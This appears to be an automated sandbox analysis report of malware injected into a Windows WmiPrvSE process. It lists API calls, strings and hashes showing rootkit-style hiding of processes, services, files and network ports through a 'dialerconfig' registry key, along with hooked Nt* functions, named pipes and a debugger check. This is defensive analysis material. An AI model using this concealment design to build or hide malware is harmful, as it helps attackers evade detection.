Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541719
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C541734
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541754
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C54176F
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C54178F
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5417AA
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C5417CA

Sleep.KERNEL32 ref: 000001F43C541AD7
SleepEx.KERNELBASE ref: 000001F43C541ADD

Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5417E5
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541805
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C541820
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541840
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C54185B
Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C54187B
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C541896
Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5418A0

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 0abf03ab2f68e5925787b9756edb314a7711eee1de889495ec12e96c467ada5b
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: E331CA71220E7393FB549B27DA413FB23E5BB84BC4F2454319F0A876A6EE26C851C618

Function 000001F43C51273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001F43C51285E

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 3255344ca52122ba61ac838147999ebd10dfdadb2564b398ca798c600e38fa22
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: BC610336B01AB587EF548F1A98447BEB3D2F754B98F188131DF6907788DA38E892C704

Non-executed Functions

Function 000001F43C542B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001F43C542BD0
lstrlenW.KERNEL32 ref: 000001F43C542E0A

Part of subcall function 000001F43C54199C: OpenProcess.KERNEL32 ref: 000001F43C5419C2
Part of subcall function 000001F43C54199C: K32GetModuleFileNameExW.KERNEL32 ref: 000001F43C5419E0
Part of subcall function 000001F43C54199C: PathFindFileNameW.SHLWAPI ref: 000001F43C5419EF
Part of subcall function 000001F43C54199C: lstrlenW.KERNEL32 ref: 000001F43C5419FB
Part of subcall function 000001F43C54199C: StrCpyW.SHLWAPI ref: 000001F43C541A0E
Part of subcall function 000001F43C54199C: CloseHandle.KERNEL32 ref: 000001F43C541A1C

GetProcAddress.KERNEL32 ref: 000001F43C542BE5

Part of subcall function 000001F43C54152C: StrCmpIW.SHLWAPI ref: 000001F43C54155D

Part of subcall function 000001F43C543844: StrCmpNIW.SHLWAPI ref: 000001F43C54385C

StrCmpNIW.SHLWAPI ref: 000001F43C542C28
lstrlenW.KERNEL32 ref: 000001F43C542D50

Strings

\Device\Nsi, xrefs: 000001F43C542C1B
ntdll.dll, xrefs: 000001F43C542BC9
NtQueryObject, xrefs: 000001F43C542BDB

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: cc1c2f5be02bb854c6362e19e3c2d8aa9963211729cf9709ea9c23d7fce6e41e
Instruction ID: 2d07b1bdf7fbbcaae019e956a200241762f985a54625f4d66ede3567c0a2b61a
Opcode Fuzzy Hash: cc1c2f5be02bb854c6362e19e3c2d8aa9963211729cf9709ea9c23d7fce6e41e
Instruction Fuzzy Hash: 6AB16A72210EB283FB688F26D8407FA63E5FB54B88F645026EF0993B94DE35D851C748

Function 000001F43C547D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F43C547DAC
RtlCaptureContext.NTDLL ref: 000001F43C547DD9
RtlLookupFunctionEntry.NTDLL ref: 000001F43C547DF3
RtlVirtualUnwind.NTDLL ref: 000001F43C547E34
IsDebuggerPresent.KERNEL32 ref: 000001F43C547E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F43C547EA9
UnhandledExceptionFilter.KERNEL32 ref: 000001F43C547EB4

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 3efdc8950caeebca5da5f2a5077092a8534b3e008cb0160dbd81bc5253e3100e
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: B7311972215EA18AFB609F61E8807EE73A4F784744F54442ADB4E57B98EF38C648CB14

Function 000001F43C54D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F43C54D31D
RtlLookupFunctionEntry.NTDLL ref: 000001F43C54D335
RtlVirtualUnwind.NTDLL ref: 000001F43C54D370
IsDebuggerPresent.KERNEL32 ref: 000001F43C54D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F43C54D3B3
UnhandledExceptionFilter.KERNEL32 ref: 000001F43C54D3BE

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 9917a62ab3396ef01ab459de179ff39ca369291c2b59d8dcf5e986ca99f956fd
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: C5314932214FA186EB609F26E8403EE73A4F789794F610126EB9E43B99DF38C555CB04

Function 000001F43C541628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001F43C541633
HeapAlloc.KERNEL32 ref: 000001F43C541642

Part of subcall function 000001F43C541268: GetProcessHeap.KERNEL32 ref: 000001F43C54126E
Part of subcall function 000001F43C541268: HeapAlloc.KERNEL32 ref: 000001F43C54127D
Part of subcall function 000001F43C541268: GetProcessHeap.KERNEL32 ref: 000001F43C541297
Part of subcall function 000001F43C541268: HeapAlloc.KERNEL32 ref: 000001F43C5412A8

RegOpenKeyExW.ADVAPI32 ref: 000001F43C5416B2
RegOpenKeyExW.ADVAPI32 ref: 000001F43C5416DF
RegCloseKey.ADVAPI32 ref: 000001F43C5416F9
RegOpenKeyExW.ADVAPI32 ref: 000001F43C541719
RegCloseKey.ADVAPI32 ref: 000001F43C541734
RegOpenKeyExW.ADVAPI32 ref: 000001F43C541754
RegCloseKey.ADVAPI32 ref: 000001F43C54176F
RegOpenKeyExW.ADVAPI32 ref: 000001F43C54178F
RegCloseKey.ADVAPI32 ref: 000001F43C5417AA
RegOpenKeyExW.ADVAPI32 ref: 000001F43C5417CA
RegCloseKey.ADVAPI32 ref: 000001F43C5417E5
RegOpenKeyExW.ADVAPI32 ref: 000001F43C541805
RegCloseKey.ADVAPI32 ref: 000001F43C541820
RegOpenKeyExW.ADVAPI32 ref: 000001F43C541840
RegCloseKey.ADVAPI32 ref: 000001F43C54185B
RegOpenKeyExW.ADVAPI32 ref: 000001F43C54187B
RegCloseKey.ADVAPI32 ref: 000001F43C541896
RegCloseKey.ADVAPI32 ref: 000001F43C5418A0

Part of subcall function 000001F43C5412BC: RegQueryInfoKeyW.ADVAPI32 ref: 000001F43C541319
Part of subcall function 000001F43C5412BC: GetProcessHeap.KERNEL32 ref: 000001F43C541327
Part of subcall function 000001F43C5412BC: HeapAlloc.KERNEL32 ref: 000001F43C541338
Part of subcall function 000001F43C5412BC: RegEnumValueW.ADVAPI32 ref: 000001F43C541397
Part of subcall function 000001F43C5412BC: GetProcessHeap.KERNEL32 ref: 000001F43C5413DF
Part of subcall function 000001F43C5412BC: HeapAlloc.KERNEL32 ref: 000001F43C5413ED
Part of subcall function 000001F43C5412BC: GetProcessHeap.KERNEL32 ref: 000001F43C54140A
Part of subcall function 000001F43C5412BC: HeapFree.KERNEL32 ref: 000001F43C541418
Part of subcall function 000001F43C5412BC: lstrlenW.KERNEL32 ref: 000001F43C541421
Part of subcall function 000001F43C5412BC: GetProcessHeap.KERNEL32 ref: 000001F43C54142F
Part of subcall function 000001F43C5412BC: HeapAlloc.KERNEL32 ref: 000001F43C54143D

Strings

paths, xrefs: 000001F43C541788
process_names, xrefs: 000001F43C54174D
udp, xrefs: 000001F43C541874
service_names, xrefs: 000001F43C5417C3
SOFTWARE\dialerconfig, xrefs: 000001F43C541692
tcp_remote, xrefs: 000001F43C541839
pid, xrefs: 000001F43C541712
startup, xrefs: 000001F43C5416D5
tcp_local, xrefs: 000001F43C5417FE

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 74e9b7de03cc36a8a50128a1d0ba716784c7176efb6a80b4fa8bd0760b5821d1
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 3771E876611E7287FB109F67E8506EB23A4F784B98F401121DA4E47B69EE35C444C748

Function 000001F43C5412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F43C541319
GetProcessHeap.KERNEL32 ref: 000001F43C541327
HeapAlloc.KERNEL32 ref: 000001F43C541338
RegEnumValueW.ADVAPI32 ref: 000001F43C541397

Part of subcall function 000001F43C54152C: StrCmpIW.SHLWAPI ref: 000001F43C54155D

GetProcessHeap.KERNEL32 ref: 000001F43C5413DF
HeapAlloc.KERNEL32 ref: 000001F43C5413ED
GetProcessHeap.KERNEL32 ref: 000001F43C54140A
HeapFree.KERNEL32 ref: 000001F43C541418
lstrlenW.KERNEL32 ref: 000001F43C541421
GetProcessHeap.KERNEL32 ref: 000001F43C54142F
HeapAlloc.KERNEL32 ref: 000001F43C54143D
StrCpyW.SHLWAPI ref: 000001F43C54145F
GetProcessHeap.KERNEL32 ref: 000001F43C541476
HeapFree.KERNEL32 ref: 000001F43C541484

Strings

d, xrefs: 000001F43C54135A

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: 56c2be118a202614004c6c479e4ef25cf97ed3bf804872c77ef91c327d47b5c0
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: 8F511676201FA587EB54CF63E9483ABB7E1F789B99F144124DA4A07B68DF3CC0498B04

Function 000001F43C541D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001F43C541D1F

Part of subcall function 000001F43C541FD4: GetModuleHandleA.KERNEL32 ref: 000001F43C541FEC
Part of subcall function 000001F43C541FD4: GetProcAddress.KERNEL32 ref: 000001F43C541FFD

Part of subcall function 000001F43C545B30: GetCurrentThreadId.KERNEL32 ref: 000001F43C545B6B

Strings

NtDeviceIoControlFile, xrefs: 000001F43C541E56
NtQuerySystemInformation, xrefs: 000001F43C541D45
NtEnumerateValueKey, xrefs: 000001F43C541DD6
ntdll.dll, xrefs: 000001F43C541D2D
EnumServicesStatusExW, xrefs: 000001F43C541E11, 000001F43C541E32
NtEnumerateKey, xrefs: 000001F43C541DB9
NtQueryDirectoryFileEx, xrefs: 000001F43C541D9C
NtResumeThread, xrefs: 000001F43C541D62
advapi32.dll, xrefs: 000001F43C541DF7, 000001F43C541E18
sechost.dll, xrefs: 000001F43C541E39
EnumServiceGroupW, xrefs: 000001F43C541DF0
NtQueryDirectoryFile, xrefs: 000001F43C541D7F

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 6390a7f49ed69d06baf940dea7ca4c5d33c2f4884a41a334f23daade4d3772a6
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 0C31C475500D7BA3FA04EF67ED516F723A1BB10398FD05033D60A02171DE38928ACB58

Function 000001F43C516910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F43C516938
__scrt_acquire_startup_lock.LIBCMT ref: 000001F43C51698A
_RTC_Initialize.LIBCMT ref: 000001F43C5169B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F43C5169DE
__scrt_release_startup_lock.LIBCMT ref: 000001F43C516A09

Strings

`eh vector copy constructor iterator', xrefs: 000001F43C516A3B
scriptor', xrefs: 000001F43C516B39, 000001F43C516BB2, 000001F43C516BEC
`dynamic initializer for ', xrefs: 000001F43C5169C7
`eh vector vbase copy constructor iterator', xrefs: 000001F43C5169EE

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 9ca37e1f449c8b57ead7480c6c0404165d47bf0f63e65695bcf3587cd18279a8
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 0481DF31702E7387FE50AB2798493FB22D0FB95B88F588135AB6547796DF38C9458708

Function 000001F43C54CE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 000001F43C54CE37
FlsGetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CE4C
FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CE6D
FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CE9A
FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CEAB
FlsSetValue.KERNEL32(?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CEBC
SetLastError.KERNEL32 ref: 000001F43C54CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF0D
FlsSetValue.KERNEL32(?,?,00000001,000001F43C54ECCC,?,?,?,?,000001F43C54BF9F,?,?,?,?,?,000001F43C547AB0), ref: 000001F43C54CF2C

Part of subcall function 000001F43C54D6CC: HeapAlloc.KERNEL32 ref: 000001F43C54D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF54

Part of subcall function 000001F43C54D744: HeapFree.KERNEL32 ref: 000001F43C54D75A
Part of subcall function 000001F43C54D744: GetLastError.KERNEL32 ref: 000001F43C54D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F43C550A6B,?,?,?,000001F43C55045C,?,?,?,000001F43C54C84F), ref: 000001F43C54CF76

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: bf3fd5c5c1e5fa9902cbb161980078e8aa4cbca625af3a669604916522f418ba
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: E5417C30301E7747FE69A73799513FB32C27B847B0F340734AB368A6E6DE28A4519608

Function 000001F43C542244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F43C542259
GetCurrentProcessId.KERNEL32 ref: 000001F43C542263

Part of subcall function 000001F43C541934: OpenProcess.KERNEL32 ref: 000001F43C541952
Part of subcall function 000001F43C541934: IsWow64Process.KERNEL32 ref: 000001F43C541968
Part of subcall function 000001F43C541934: CloseHandle.KERNEL32 ref: 000001F43C541983

CreateFileW.KERNEL32 ref: 000001F43C5422BC
WriteFile.KERNEL32 ref: 000001F43C5422E4
ReadFile.KERNEL32 ref: 000001F43C542303
CloseHandle.KERNEL32 ref: 000001F43C54230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 000001F43C542293
\\.\pipe\dialerchildproc64, xrefs: 000001F43C54228C

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: bc311bd4bfbdd512de59420b27951e7ef25f52a6d9d7746056e23ca5d412341e
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: BC213C76614A7183FB10CB26E5443AA63A1F789BA5F500225EB5A03BA8CF3CC149CF04

Function 000001F43C519944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F43C5199A1

Part of subcall function 000001F43C51A814: __GetUnwindTryBlock.LIBCMT ref: 000001F43C51A857
Part of subcall function 000001F43C51A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F43C51A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F43C519A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F43C519CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F43C519DDA

Strings

csm, xrefs: 000001F43C5199BB
csm, xrefs: 000001F43C519A22
csm, xrefs: 000001F43C519A9C

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 4ba18bb60a7f7e2ff171842eb5cacfecb7860d21566915ac70216b585e6c40c4
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: F8E16872604B628BFF609B2694883EE77E0F755B9CF100125EBAA57B99CB38C591C704

Function 000001F43C54A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F43C54A5A1

Part of subcall function 000001F43C54B414: __GetUnwindTryBlock.LIBCMT ref: 000001F43C54B457
Part of subcall function 000001F43C54B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F43C54B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F43C54A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F43C54A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F43C54A9DA

Strings

csm, xrefs: 000001F43C54A69C
csm, xrefs: 000001F43C54A5BB
csm, xrefs: 000001F43C54A622

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aafa923bcba82b6be8ae00af4d8b5db3ec9649b79742a36e3fcc25e1c44b9e43
Instruction ID: 623ce3150fdf247c27396c98418e7f233fcdbfc54e4715f78f9b36cafe8b9103
Opcode Fuzzy Hash: aafa923bcba82b6be8ae00af4d8b5db3ec9649b79742a36e3fcc25e1c44b9e43
Instruction Fuzzy Hash: 28E16B72604BB18BFBA09F6694823EE77E4F755B98F200126EF8957B99CB34C481C704

Function 000001F43C54F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32 ref: 000001F43C54F510
GetProcAddress.KERNEL32 ref: 000001F43C54F51C

Strings

api-ms-, xrefs: 000001F43C54F45A
ext-ms-, xrefs: 000001F43C54F46D

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 38dcbd5a2a2d0ec7fa1d86277db557ef3bef89b38fead37e513f868cac2f4410
Instruction ID: 611a741576f9beb5b2b0478944c59847598150b52c1153bd1ce9e61ab609842d
Opcode Fuzzy Hash: 38dcbd5a2a2d0ec7fa1d86277db557ef3bef89b38fead37e513f868cac2f4410
Instruction Fuzzy Hash: FD418E32311E7293FA56CB6BAC047F722D1BB49BE0F6942359E0A87794EE38C445821C

Function 000001F43C54104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F43C5410B1
RegEnumValueW.ADVAPI32 ref: 000001F43C541117
GetProcessHeap.KERNEL32 ref: 000001F43C54115A
HeapAlloc.KERNEL32 ref: 000001F43C541168
GetProcessHeap.KERNEL32 ref: 000001F43C541185
HeapFree.KERNEL32 ref: 000001F43C541193

Strings

d, xrefs: 000001F43C5410D6

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 53a6d973c5cd98bcc6426c81824b946fb4f576954b2cf140b86fdf356db156e3
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 2D414A72214FA5C7E760CF22E4447AB77A1F388B98F148129DB8A07B58DF39C449CB04

Function 000001F43C54D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsGetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D087
FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0A6
FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0CE
FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0DF
